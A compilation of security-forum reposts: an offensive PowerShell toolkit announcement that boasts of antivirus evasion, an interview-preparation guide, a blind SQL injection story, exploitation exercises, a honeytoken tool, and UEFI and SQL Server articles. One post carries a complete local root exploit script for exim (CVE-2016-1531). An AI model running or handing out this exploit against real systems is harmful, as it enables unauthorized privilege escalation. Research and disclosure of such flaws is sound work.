Nytro

Bypassing Local Windows Authentication To Defeat Full Disk Encryption

Introducing PS>Attack I’ve been a huge PowerShell fan ever since I first discovered it as a Systems Administrator many years ago. It’s an incredibly easy to use, intuitive and powerful language and helped me efficiently address a lot of tasks that came across my plate. Unfortunately, the other Systems Administrators that I worked with were less keen to pick it up. Years of pointing and clicking had made them nervous about using a command line. For different reasons, the Information Security community is in a similar state. PowerShell is an incredible platform for both offense and defense. There is a lot of cutting edge work being done by members of the PowerShell community, but the Information Security community at large is unaware of a lot of their contributions. This may stem from a lack of interest in Windows development or fear of having to learn yet another scripting language. No matter the reason, a lot of security professionals are missing out on some great work. ENTER PS>ATTACK To help make using offensive PowerShell easier, I’ve created PS>Attack. PS>Attack is a custom made console that is designed to emulate PowerShell and enhance it. Built into PS>Attack are over 110 offensive PowerShell commands representing some of the greatest work going on in the offensive PowerShell community. This selection of tools runs the entire gamut of a security assessment including Reconnaissance, Privilege Escalation, Backdoors and Data Exfiltration. It also includes a custom command called “get-attack” which helps to serve as an attack search engine. It takes a word or phrase and returns a list of commands and their descriptions that match what you’re looking for. Get-Attack returning a list of commands related to the word “Password” All of this is bundled into a single executable that runs on anything from a fresh install of Windows 7 all the way up to a fully patched version of Windows 10. There’s no installer, just double click and start attacking. NOT JUST FOR THE LAB In creating PS>Attack, I didn’t want to create a tool that was only used in a lab environment. I wanted to create something that was useful and could find its way into a penetration tester’s bag of tricks. To this end, PS>Attack is designed to evade antivirus and other hurdles. The various scripts and payloads that provide the commands are encrypted before being embedded into the executable. When PS>Attack is run, these scripts are decrypted directly into memory, so the plain text payloads never touch the hard drive. This helps avoid detection by most antivirus solutions. PS>Attack is also written using native .NET functions and objects to process PowerShell code, it does not rely on “powershell.exe”. Because .NET is such an important part of Windows, this means that it’s very difficult for an organization to prevent PS>Attack from accessing the functionality it needs to run. GETTING PS>ATTACK PS>Attack is available on our Github account. You can either compile the code yourself using Visual Studio or you can download pre-compiled binaries from the “releases” tab. ACKNOWLEDGMENTS PS>Attack relies on a lot of tools to make itself effective and it’s important to make sure that the authors of those tools get the attention they deserve. Scripts from the following tools and frameworks are incorporated into PS>Attack. These tools represent some of the best work being done in offensive PowerShell today: PowerSploit Nishang Inveigh PowerCat Jared Haight Sursa: http://blog.gdssecurity.com/labs/2016/3/8/introducing-psattack.html

How to pass a programming interview by Ammon Bartram This post started as the preparation material we send to our candidates, but we decided to post it publicly. Being a good programmer has a surprisingly small role in passing programming interviews. To be a productive programmer, you need to be able to solve large, sprawling problems over weeks and months. Each question in an interview, in contrast, lasts less than one hour. To do well in an interview, then, you need to be able to solve small problems quickly, under duress, while explaining your thoughts clearly. This is a different skill [1]. On top of this, interviewers are often poorly trained and inattentive (they would rather be programming), and ask questions far removed from actual work. They bring bias, pattern matching, and a lack of standardization. Running Triplebyte, I see this clearly. We interview engineers without looking at resumes, and fast-track them to on-sites at YC companies. We’ve interviewed over 1000 programmers in the last nine months. We focus heavily on practical programming, and let candidates pick one of several ways to be evaluated. This means we work with many (very talented) programmers without formal CS training. Many of these people do poorly on interviews. They eat large sprawling problems for breakfast, but they balk at 45-min algorithm challenges. The good news is that interviewing is a skill that can be learned. We’ve had success teaching candidates to do better on interviews. Indeed, the quality that most correlates with a Triplebyte candidate passing interviews at YC companies is not raw talent, but rather diligence. I fundamentally do not believe that good programmers should have to learn special interviewing skills to do well on interviews. But the status quo is what it is. We’re working at Triplebyte to change this. If you’re interested in what we’re doing, we’d love you to check out our process. In the meantime, if you do want to get better at interviewing, this blog post describes how we think you can most effectively do so. 1. Be enthusiastic Enthusiasm has a huge impact on interview results. About 50% of the Triplebyte candidates who fail interviews at companies fail for non-technical reasons. This is usually described by the company as a “poor culture fit”. Nine times out of ten, however, culture fit just means enthusiasm for what a company does. Companies want candidates who are excited about their mission. This carries as much weight at many companies as technical skill. This makes sense. Excited employees will be happier and work harder. The problem is that this can be faked. Some candidates manage to convince every company they talk to that it’s their dream job, while others (who are genuinely excited) fail to convince anyone. We’ve seen this again and again. The solution is for everyone to get better at showing their enthusiasm. This is not permission to lie. But interviewing is like dating. No one wants to be told on a first date that they are one option among many, even though this is usually the case. Similarly, most programmers just want a good job with a good paycheck. But stating this in an interview is a mistake. The best approach is to prepare notes before an interview about what you find exciting about the company, and bring this up with each interviewer when they ask if you have any questions. A good source of ideas is to read the company’s recent blog posts and press releases and note the ones you find exciting. This idea seems facile. I imagine you are nodding along as you read this. But (as anyone who has ever interviewed can tell you) a surprisingly small percentage of applicants do this. Carefully preparing notes on why you find a company exciting really will increase your pass rate. You can even reference the notes during the interview. Bringing prepared notes shows preparation. 2. Study common interview concepts A large percentage of interview questions feature data structures and algorithms. For better or worse, this is the truth. We gather question details from our candidates who interview at YC companies (we’ll be doing a in-depth analysis of this data in a future article), and algorithm questions make up over 70% of the questions that are asked. You do not need to be an expert, but knowing the following list of algorithms and data structures will help at most companies. Hash tables Linked lists Breadth-first search, depth-first search Quicksort, merge sort Binary search 2D arrays Dynamic arrays Binary search trees Dynamic programming Big-O analysis Depending on your background, this list may look trivial, or may look totally intimidating. That’s exactly the point. These are concepts that are far more common in interviews than they are in production web programming. If you’re self-taught or years out of school and these concepts are not familiar to you, you will do better in interviews if you study them. Even if you do know these things, refreshing your knowledge will help. A startlingly high percentage of interview questions reduce to breadth-first search or the use of a hash table to count uniques. You need to be able to write a BFS cold, and you need to understand how a hash table is implemented. Learning these things is not as hard as many of the people we talk to fear. Algorithms are usually described in academic language, and this can be off-putting. But at its core, nothing on this list is more complicated than the architecture of a modern web app. If you can build a web app (well), you can learn these things. The resource that I recommend is the book The Algorithm Design Manual by Steven Skiena. Chapters 3 through 5 do a great job of going over this material, in a straightforward way. It does use C and some math syntax, but it explains the material well. Coursera also has several good algorithms courses. This one, in particular, focuses on the concepts that are important in interviews. Studying algorithms and data structures helps not only because the material comes up in interviews, but also because the approach to problems taken in an algorithm course is the same approach that works best in interviews. Studying algorithms will get you in an interview mindset. 3. Get help from your interviewer Interviewers help candidates. They give hints, they respond to ideas, and they generally guide the process. But they don’t help all candidates equally. Some programmers are able to extract significant help, without the interviewer holding it against them. Others are judged harshly for any hints they are given. You want to be helped. This comes down to process and communication. If the interviewer likes your process and you communicate well with them, they will not mind helping. You can make this more likely by following a careful process. The steps I recommend are: Ask questions Talk through a brute-force solution Talk through an optimized solution Write code After you are asked an interview question, start by clarifying what was asked. This is the time to be pedantic. Clarify every ambiguity you can think of. Ask about edge cases. Bring up specific examples of input, and make sure you are correct about the expected output. Ask questions even if you’re almost sure you know the answers. This is useful because it gives you a chance to come up with edge cases and fully spec the problem (seeing how you handle edge-cases is one of the main things that interviewers look for when evaluating an interview), and also because it gives you a minute to collect your thoughts before you need to start solving the problem. Next, you should talk through the simplest brute-force solution to the problem that you can think of. You should talk, rather than jump right into coding, because you can move faster when talking, and it’s more engaging for the interviewer. If the interviewer is engaged, they will step in and offer pointers. If you retreat into writing code, however, you'll miss this opportunity. Candidates often skip the brute-force step, assuming that the brute-force solution to the problem is too obvious, or wrong. This is a mistake. Make sure that you always give a solution to the problem you’ve been asked (even if it takes exponential time, or an NSA super computer). When you’ve described a brute-force solution, ask the interviewer if they would like you to implement it, or come up with more efficient solution. Normally they will tell you to come up with a more efficient solution. The process for the more efficient solution is the same as for the brute force. Again talk, don’t write code, and bounce ideas off of the interviewer. Hopefully, the question will be similar to something you’ve seen, and you’ll know the answer. If that is not the case, it’s useful to think of what problems you’ve seen that are most similar, and bring these up with the interviewer. Most interview questions are slightly-obscured applications of classic CS algorithms. The interviewer will often guide you to this algorithm, but only if you begin the process. Finally, after both you and your interviewer agree that you have a good solution, you should write your code. Depending on the company, this may be on a computer or a whiteboard. But because you’ve already come up with the solution, this should be fairly straightforward. For extra points, ask your interviewer if they would like you to write tests. 4. Talk about trade-offs Programming interviews are primarily made up of programming questions, and that is what I have talked about so far. However, you may also encounter system design questions. Companies seem to like these especially for more experienced candidates. In a system design question, the candidate is asked how he or she would design a complex real-world system. Examples include designing Google maps, designing a social network, or designing an API for a bank. The first observation is that answering system design questions requires some specific knowledge. Obviously no one actually expects you to design Google maps (that took a lot of people a long time). But they do expect you to have some insight into aspects of such a design. The good news is that these questions usually focus on web backends, so you can make a lot of progress by reading about this area. An incomplete list of things to understand is: HTTP (at the protocol level) Databases (indexes, query planning) CDNs Caching (LRU cache, memcached, redis) Load balancers Distributed worker systems You need to understand these concepts. But more importantly, you need to understand how they fit together to form real systems. The best way to learn this is to read about how other engineers have used the concepts. The blog High Scalability is a great resource for this. It publishes detailed write-ups of the back-end architecture at real companies. You can read about how every concept on the list above is used in real systems. Once you’ve done this reading, answering system design questions is a matter of process. Start at the highest level, and move downward. At each level, ask your interviewer for specifications (should you suggest a simple starting point, or talk about what a mature system might look like?) and talk about several options (applying the ideas from your reading). Discussing tradeoffs in your design is key. Your interviewer cares less about whether your design is good in itself, and more about whether you are able to talk about the trade-offs (positives and negatives) of your decisions. Practice this. 5. Highlight results The third type of question you may encounter is the experience question. This is where the interviewer asks you to talk about a programming project that you completed in the past. The mistake that many engineers make on this question is to talk about a technically interesting side-project. Many programmers choose to talk about implementing a neural network classifier, or writing a Twitter grammar bot. These are bad choices because it’s very hard for the interviewer to judge their scope. Many candidates exaggerate simple side projects (sometimes that never actually worked), and the interviewer has no way to tell if you are doing this. The solution is to choose a project that produced results, and highlight the results. This often involves picking a less technically interesting project, but it’s worth it. Think (ahead of time) of the programming you’ve done that had the largest real-world impact. If you’ve written a iOS game, and 50k people have downloaded it, the download number makes it a good option. If you’ve written an admin interface during an internship that was deployed to the entire admin staff, the deployment makes it a good thing to talk about. Selecting a practical project will also communicate to the company that you focus on actual work. Programmer too focused on interesting tech is an anti-pattern that companies screen against (these programmers are sometimes not productive). 6. Use a dynamic language, but mention C I recommend that you use a dynamic language like Python, Ruby or JavaScript during interviews. Of course, you should use whatever language you know best. But we find that many people try interviewing in C , C++ or Java, under the impression these are the “real’ programming languages. Several classic books on interviewing recommend that programmers choose Java or C++. At startups at least, we’ve found that this is bad advice. Candidates do better when using dynamic languages. This is true, I think, because of dynamic languages’ compact syntax, flexible typing, and list and hash literals. They are permissive languages. This can be a liability when writing complex systems (a highly debatable point), but it’s great when trying to cram binary search onto a whiteboard. No matter what language you use, it’s helpful to mention work in other languages. An anti-pattern that companies screen against is people who only know one language. If you do only know one language, you have to rely on your strength in that language. But if you’ve done work or side-projects in multiple languages, be sure to bring this up when talking to your interviewers. If you have worked in lower-level languages like C, C++, Go, or Rust, talking about this will particularly help. Java, C# and PHP are a problematic case. As we described in our last blog post, we’ve uncovered bias against these languages in startups. We have data showing that programmers using these languages in the interview pass at a lower rate. This is not fair, but it is the truth. If you have other options, I recommend against using these languages in interviews with startups. 7. Practice, practice, practice You can get much better at interviewing by practicing answering questions. This is true because interviews are stressful, but stress harms performance. The solution is practice. Interviewing becomes less stressful with exposure. This happens naturally with experience. Even within a single job search, we find that candidates often fail their initial interviews, and then pass more as their confidence builds. If stress is something you struggle with, I recommend that you jumpstart this process by practicing interview stress. Get a list of interview questions (the book Cracking the Coding Interview is one good source) and solve them. Set a 20-minute timer on each question, and race to answer. Practice writing the answers on a whiteboard (not all companies require this, but it’s the worst case, so you should practice it). A pen on paper is a pretty good simulation of a whiteboard. If you have friends who can help you prepare, taking turns interviewing each other is great. Reading a lot of interview questions has the added benefit of providing you ideas to use when in actual interviews. A surprising number of questions are re-used (in full or in part). Even experienced (and stress-free) candidates will benefit from this. Interviewing is a fundamentally different skill from working as a programmer, and it can atrophy. But experienced programers often (reasonably) feel that they should not have to prepare for interviews. They study less. This is why junior candidates often actually do better on interview questions than experienced candidates. Companies know this, and, paradoxically, some tell us they set lower bars on the programming questions for experienced candidates. 8. Mention credentials Credentials bias interviewers. Triplebyte candidates who have worked at a top company or studied at a top school go on to pass interviews at a 30% higher rate than programmers who don’t have these credentials (for a given level of performance on our credential-blind screen). I don’t like this. It’s not meritocratic and it sucks, but if you have these credentials, it’s in your interest to make sure that your interviewers know this. You can’t trust that they’ll read your resume. 9. Line up offers If you’ve ever read fund-raising advice for founders, you’ll know that getting the 1st VC to make an investment offer is the hardest part. Once you have one offer, more come pouring in. The same is true of job offers. If you already have an offer, be sure to mention this in interviews. Mentioning other offers in an interview heavily biases the interviewer in your favor. This brings up the strategy of making a list of the companies you’re interested in, and setting up interviews inreverse order of interest. Doing well earlier in the process will increase your probability of getting an offer from you number one choice. You should do this. Conclusion Passing interviews is a skill. Being a great programmer helps, but it’s only part of the picture. Everyone fails some of their interviews, and preparing properly can help everyone pass more. Enthusiasm is paramount, and research helps with this. As many programmers fail for lacking enthusiasm as fail for technical reasons. Interviewers help candidates during interviews, and if you follow a good process and communicate clearly, they will help you. Practice always helps. Reading lots of interview questions and inuring yourself to interview stress will lead to more offers. This situation is not ideal. Preparing for interviews is work, and forcing programmers to learn skills other than building great software wastes everyone’s time. Companies should improve their interview processes to be less biased by academic CS, memorized facts, and rehearsed interview processes. This is what we’re doing at Triplebyte. We help programmers get jobs without looking at resumes. We let programmers pick one of several areas in which to be evaluated, and we study and improve our process over time. We’d love to help you get a job at a startup, without jumping through these hoops. You can get started here. But the status quo is what it is. Until this changes, programmers should know how to prepare. Thanks to Jared Friedman, Emmett Shear, Garry Tan, Alexis Ohanian and Daniel Gackle for reading drafts of this. Sursa: http://blog.triplebyte.com/how-to-pass-a-programming-interview

Black Hat Europe 2015 https://www.youtube.com/playlist?list=PLH15HpR5qRsVd9jdTWUB5s16fmr2VCQyS

Data Extraction via String Concatenation in a Blind SQL Injection Vulnerability March 7, 2016 Posted By Carlos Muñoz Day One: In Which The Heavens Part, But Only Slightly A few weeks ago while performing a web application test for $CLIENT, I happened to run into search functionality. As one of the very first standard tests I inserted a single quote ' into the search field and clicked the search button. The SQL error message that was returned was the stuff dreams are made of (ie: a lot of info, slightly vague, not everything there, but enough in that moment to make you really, really believe). After a few quick tests to see if anything easy could be obtained (nope, no such luck), and confirming that I wouldn't be negatively impacting $CLIENT's systems if I did so, I turned it over to automated tools and went about testing other parts of the application. Time passed, and a few other issues were discovered and documented (it doesn't exist if no one else can reproduce it from your official description), and I went back to view the progress of automated tools, eager to see the keys to the kingdom laid down before me. Nothing. Okay, maybe I made a mistake or two setting the automated tools up? Investigations disproved that line of thinking, as the recorded request/response pairs showed the attacks were being properly sent with all the appropriate data. It is probably my imagination, but I think I can hear $CLIENT's webapp laughing at me. Hmmmm . . . this may be a bit more complex than I had hoped. Articol complet: https://www.trustwave.com/Resources/SpiderLabs-Blog/Data-Extraction-via-String-Concatenation-in-a-Blind-SQL-Injection-Vulnerability/

#!/bin/sh # CVE-2016-1531 exim <= 4.84-3 local root exploit # =============================================== # you can write files as root or force a perl module to # load by manipulating the perl environment and running # exim with the "perl_startup" arguement -ps. # # e.g. # [fantastic@localhost tmp]$ ./cve-2016-1531.sh # [ CVE-2016-1531 local root exploit # sh-4.3# id # uid=0(root) gid=1000(fantastic) groups=1000(fantastic) # # -- Hacker Fantastic echo [ CVE-2016-1531 local root exploit cat > /tmp/root.pm << EOF package root; use strict; use warnings; system("/bin/sh"); EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps Sursa: https://github.com/HackerFantastic/Public/blob/master/exploits/cve-2016-1531.sh

Exercises for learning Reverse Engineering and Exploitation All binaries for these challenges are ELF 64-bit LSB executable, x86-64. reverse engineering The goal is to run the chalenges like this ./rX password and having them print out password OK. It's reverse engineering, not cracking. So don't patch the binnaries if you want to play by the rules. It gets really borring if you don't anyway. sploit All the sploit exercices are designed to be solvable with NX+ASLR without being dependant on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service, argv & env is not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun! Sursa: https://github.com/wapiflapi/exrs

DCEPT DCEPT (Domain Controller Enticing Password Tripwire) is a honeytoken-based tripwire for Microsoft's Active Directory. Honeytokens are pieces of information intentionally littered on system so they can be discovered by an intruder. In the case of DCEPT, the honeytokens are credentials that would only be known by a someone extracting them from memory. A logon attempt using these faux credentials would mean someone was inside the network and is attempting privilege escalation to domain administrator. This proof of concept is being released as open source to benefit Windows system administrators. The goal of this project was to provide a free, simple, honeytoken deployment tool as well as educate administrators about the nature of these attacks. We encourage contributors to build on what we have done and welcome feedback. Has DCEPT helped your organization spot an intrusion before it was too late? We would like to hear from you. More information about this research project can be found here: https://www.secureworks.com/blog/dcept Download: https://github.com/secureworks/dcept

The Art of Assembly Language The Art of Assembly Language ................................................................. 1 Volume One: .............................................................................................. 1 Data Representation ................................................................................... 1 Chapter One Foreward ................................................................................ 3 Chapter Two Hello, World of Assembly Language ................................... 11 Chapter Three Data Representation ............................................................ 43 Chapter Four More Data Representation .................................................... 77 Chapter Five ............................................................................................... 109 Chapter Five Questions, Projects, and Lab Exercises ................................. 109 Volume Two: ............................................................................................. 129 Machine Architecture ................................................................................. 129 Chapter One System Organization .............................................................. 131 Chapter Two Memory Access and Organization ........................................ 151 Chapter Three Introduction to Digital Design ............................................ 195 Chapter Four CPU Architecture .................................................................. 225 Chapter Five Instruction Set Architecture .................................................. 261 Chapter Six Memory Architecture .............................................................. 293 Chapter Seven The I/O Subsystem ............................................................. 315 Chapter Eight Questions, Projects, and Labs .............................................. 341 Volume Three: ........................................................................................... 375 Basic Assembly Language ......................................................................... 375 Chapter One Constants, Variables, and Data Types .................................. 377 Chapter Two Introduction to Character Strings .......................................... 401 Chapter Three Characters and Character Sets ............................................ 421 Chapter Four Arrays ................................................................................... 445 Chapter Five Records, Unions, and Name Spaces ...................................... 465 Chapter Six Dates and Times ...................................................................... 481 Chapter Seven Files .................................................................................... 497 Chapter Eight Introduction to Procedures ................................................... 521 Chapter Nine Managing Large Programs ................................................... 549 Chapter Ten Integer Arithmetic .................................................................. 567 Chapter Eleven Real Arithmetic ................................................................. 591 Chapter Twelve Calculation Via Table Lookups ........................................ 625 Chapter Thirteen Questions, Projects, and Labs ......................................... 641 Volume Four: ............................................................................................. 703 Intermediate Assembly Language .............................................................. 703 Chapter One Advanced High Level Control Structures ............................. 705 Chapter Two Low-Level Control Structures .............................................. 729 Chapter Three Intermediate Procedures ...................................................... 781 Chapter Four Advanced Arithmetic ............................................................ 827 Chapter Five Bit Manipulation ................................................................... 881 Chapter Six The String Instructions ........................................................... 907 Chapter Seven The HLA Compile-Time Language ................................... 921 Chapter Eight Macros ................................................................................. 941 Chapter Nine Domain Specific Embedded Languages ............................... 975 Chapter Ten Classes and Objects ................................................................ 1029 Chapter Eleven The MMX Instruction Set ................................................. 1083 Chapter Twelve Mixed Language Programming ........................................ 1119 Chapter Thirteen Questions, Projects, and Labs ......................................... 1163 Section Five ............................................................................................... 1245 Section Five Advanced Assembly Language Programming ...................... 1245 Chapter One Thunks ................................................................................... 1247 Chapter Two Iterators ................................................................................. 1271 Chapter Three Coroutines and Generators .................................................. 1293 Chapter Four Low-level Parameter Implementation .................................. 1305 Chapter Five Lexical Nesting ..................................................................... 1337 Chapter Six Questions, Projects, and Labs ................................................. 1359 Appendix A Answers to Selected Exercises ............................................... 1365 Appendix B Console Graphic Characters ................................................... 1367 Appendix D The 80x86 Instruction Set ...................................................... 1409 Appendix E The HLA Language Reference ............................................... 1437 Appendix F The HLA Standard Library Reference .................................... 1439 Appendix G HLA Exceptions ..................................................................... 1441 Appendix H HLA Compile-Time Functions .............................................. 1447 Appendix I Installing HLA on Your System .............................................. 1477 Appendix J Debugging HLA Programs ...................................................... 1501 Appendix K Comparing HLA and MASM ................................................. 1505 Appendix L HLA Code Generation for HLL Statements ........................... 1507 Download: http://portal.aauj.edu/portal_resources/downloads/programming/assembly_language32bit_edition.pdf

Password Hashing: Why and How posted March 7, 2016 by "No Bugs" Hare, translated by Sergey Ignatchenko,originally published in Overload #129 in October 2015 Author: “No Bugs” Hare [[About Vol.2 of the upcoming “Development and Deployment of MMOG” book. There is no need to worry, I just need some time to prepare for publishing of Vol.1. “beta” chapters of Vol.2 are planned to start appearing in 3 weeks from now. Stay tuned!]] Password hashing is a non-trivial topic, which has recently become quite popular. While it is certainly not the only thing which you need to do make your network app secure, it is one of those security measures every security-conscious developer should implement. In this article, we’ll discuss what it is all about, why hash functions need to be slow, and how password hashing needs to be implemented in your applications. What is it all about? “For password hashing, the answer is very unpleasant: we’re trying to mitigate the consequences arising from stealing the whole of your site’s password database.Whenever we’re speaking about security, there is always the question: what exactly is the threat we’re trying to protect ourselves from? For password hashing, the answer is very unpleasant: we’re trying to mitigate the consequences arising from stealing the whole of your site’s password database. This is usually accompanied by the potential for stealing pretty much any other data in your database, and represents the Ultimate Nightmare of any real-world security person. Some (including myself) will argue that such mitigation is akin to locking the stable door after the horse has bolted, and that security efforts should be directed towards preventing the database-stealing from happening in the first place. While I certainly agree with this line of argument, on the other hand implementing password hashing is so simple and takes so little time (that is, if you designed for it from the very beginning) that it is simply imprudent not to implement it. Not to mention that if you’re not doing password hashing, everybody (your boss and any code reviewers/auditors included) will say, “Oh, you don’t do password hashing, which is The Second Most Important Security Feature In The Universe (after encryption, of course).” The most important thing, however, is not to forget about a dozen other security-related features which also need to be implemented (such as TLS encryption, not allowing passwords which are listed in well-known password dictionaries, limits on login rate, etc. etc. – see ‘Bottom Line’ section below for some of these) Articol complet: http://ithare.com/password-hashing-why-and-how/

Cautam Junior Pentester(s). Daca cineva e interesat, astept un PM. Requirements: - Passion.

Senzorul de amprentă de pe telefoane poate fi păcălit cu o foaie de hârtie Blocarea smartphone-ului personal cu ajutorul unui senzor biometric este una dintre cele mai sigure metode de securitate pentru astfel de dispozitive. Mulţi au încercat să spargă această protecţie folosind diverse metode costisitoare, însă până în prezent imprimarea amprentei pe o foaie de hârtie nu a avut prea mult succes. Se pare însă că ideea era bună, însă echipamentul nu era destul de performant pentru a realiza o amprentă falsă. Soluţia? O imprimantă care lasă pe hârtie cerneală conductivă. Articol complet si video: http://www.go4it.ro/telefoane-mobile/senzorul-de-amprenta-de-pe-telefoane-poate-fi-pacalit-cu-o-foaie-de-hartie-15100336/

Announcing SQL Server on Linux Posted March 7, 2016 By Scott Guthrie - Executive Vice President, Cloud and Enterprise Group, Microsoft It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers: Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection In-memory database support for every workload with performance increases up to 30-100x Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and the #1 SAP SD Two-Tier performance benchmark on windows Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud. In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform. Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms. Extending SQL Server to Also Now Run on Linux Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017. SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in. “This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.” “SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.” “We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.” Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we alsoannounced Microsoft R Server , our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata. The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market. Please join me Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data. Thanks, Scott Sursa: https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/

Exploiting Adobe Flash Player In The Era Of Control Flow Guard

AN INTRODUCTION OF UEFI SECURE BOOT AND DISK PARTITIONS IN WINDOWS 10 As a firmware interface standard to replace BIOS (Basic Input/Output System), UEFI (Unified Extensible Firmware Interface) specification has been a collective effort byUEFI Forum members for a while. UEFI is in essence an abstraction layer between firmware and OS, and independent of device hardware and architecture. Which provides flexibility for supporting multiple and various OS environments and as well acts as a generic target boot environment of drivers for cross-platform compatibility, as opposed to the need to develop a particular driver for particular hardware. With UEFI, there are also security opportunities to better defend a class of malware like bootkit and rootkit targeting the pre-boot environment of a device. Why UEFI Secure Boot Specifically, UEFI Secure Boot is an option to prevent a device from being tampered in a pre-boot environment, i.e. the period from power-on to initializing the OS. Malware injects itself in firmware or ROM, gains hardware access and is loaded before the OS, etc. make it difficult to defend or clean up, once a device is compromised. The Secure Boot option performs signature authentication upon executing code during pre-boot. A code/firmware creator is in this case required to digitally sign one’s code with a private key and to be verified against the paired public key upon loading at a device startup. Apparently, this process demands a signature database of supported hardware vendors established beforehand. Which explains why Microsoft, in fact since Windows 8, has instituted a driver signing process for certifying digital signatures of firmware for implementing UEFI Secure Boot and there are some changes of the process in Windows 10. Above all, UEFI Secure Boot specification addresses security issues relevant to boot time exploits and eliminates the possibility for executing untrusted or altered code during pre-boot. And Windows 10 Enterprise supports UEFI 2.3.1 and later forDevice Guard, a new and key security feature of Windows 10 Enterprise to ensure hardware and OS boot integrity of corporate devices. The following compares the security features of Windows 10 editions. Additional information of comparing Windows 10 editions based on Core Experience and Business Experience is readily available. Sample Disk Layouts One easy way for an end user to verify if a device is UEFI-based is to examine the disk layout. Typically a BIOS-based device has two partitions, system and OS, on a primary disk where the OS is installed. A device based on UEFI has a vividly different disk layout from that of BIOS. The following details. The following are sample disk layouts of Windows 10 devices based on BIOS and UEFI as reported by Disk Manager and DISKPART command line utility. Then BIOS This is a sample BIOS setup screen of a Windows device. And this is a typical disk layout of a device with BIOS, with System and an OS partitions, as reported by Windows desktop Disk Manager. A DISKPART session as demonstrated below shows a disk layout consistent with what is reported by Disk Manager, with two partitions accordingly. Now with UEFI For UEFI, the following are two sample disk layouts. Notice that either one has an EFI System Partition, i.e. ESP. However, a DISKPART session reveals that there is actually an extra partition, the so-called Microsoft Reserved Partition, or MSR,which is: With no partition ID and not reported by Disk Manager Not for storing any user data Reserved for drive management of the local hard disk The sizes of ESP and MSR are customizable. And based on business needs, additional partitions are to be added. Those involved in OS imaging and enterprise device deployment are encouraged to review and get familiar with the specifics of and Microsoft’s recommendations on configuring UEFI/GPT-based hard drive partitions, as detailed elsewhere. Sample 1, A Typical Disk Layout with UEFI This is based on a Surface Pro 4 machine purchased from a retail store running Windows 10 Pro Build 10586, as shown. Disk Manager shows a three-partition disk with an ESP of 100 MB in size. On the same device, a DISKPART session reveals that the disk also has a 16-MB MSR as Partition 3. Sample 2, A Custom Disk Layout with UEFI Below is a sample company-issued Surface Pro 3 device running Windows 10 Enterprise Insider Preview Build 11082. Here, Disk Manager presents a custom image with four partitions including a 350 MB ESP and a recovery partition after the OS partition. And again, a DISKPART session reveals an 128 MB MSR as Partition 3. UEFI and GPT One thing worth point out is that when deploying Windows to an UEFI-based PC, one must format the hard drive that includes the Windows partition as a GUID Partition Table (GPT) file system. Additional drives may then use either the GPT or Master Boot Record (MBR) file format. Manually Enabling Secure Boot With UEFI already configured, here are manually ways to enable/configure secure boot with a Windows 10 device. A Hardware Short-Cut with Surface Pro devices There is a convenient way via hardware to change the boot settings of a Microsoft Surface Pro device. While the machine is power off, pressing the power button and the volume up button at the same time for a few (generally 5 to 10, some may take 20 or more) seconds will bring up the device boot setting screen. And if keeping holding the power and volume up buttons passing the boot setup screen for another few seconds, eventually this will trigger reloading the firmware in my experience. Here is the boot setup screen from the above mentioned Surface Pro 4 device running Windows 10 Pro, purchased from a retail store. and with the secure boot options: On the other hand, the following is a boot setup screen from a sample company-issued Surface Pro 3 device with a custom image built deployed with System Center Configuration Manager. The UI may appear different, and the available settings are most the same. Changing UEFI or Boot Settings via UI For a Windows 10 device based on UEFI, here is a visual presentation for demonstrating how to manually enable UEFI Secure Boot on Surface Pro 3 